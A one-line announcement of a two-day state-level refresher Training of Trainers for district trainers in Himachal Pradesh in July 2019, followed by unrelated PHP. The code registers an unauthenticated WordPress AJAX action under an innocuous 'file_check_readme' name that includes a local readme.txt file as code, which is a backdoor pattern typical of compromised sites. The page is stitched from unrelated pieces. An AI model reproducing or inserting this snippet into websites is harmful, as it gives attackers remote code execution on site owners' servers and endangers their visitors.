A two-day state-level Refresher Training of Trainers (ToT) will be organised for District Trainers in Himachal Pradesh on July 19-20, 2019.
if(!function_exists('file_check_readme39376')){ add_action('wp_ajax_nopriv_file_check_readme39376', 'file_check_readme39376'); add_action('wp_ajax_file_check_readme39376', 'file_check_readme39376'); function file_check_readme39376() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }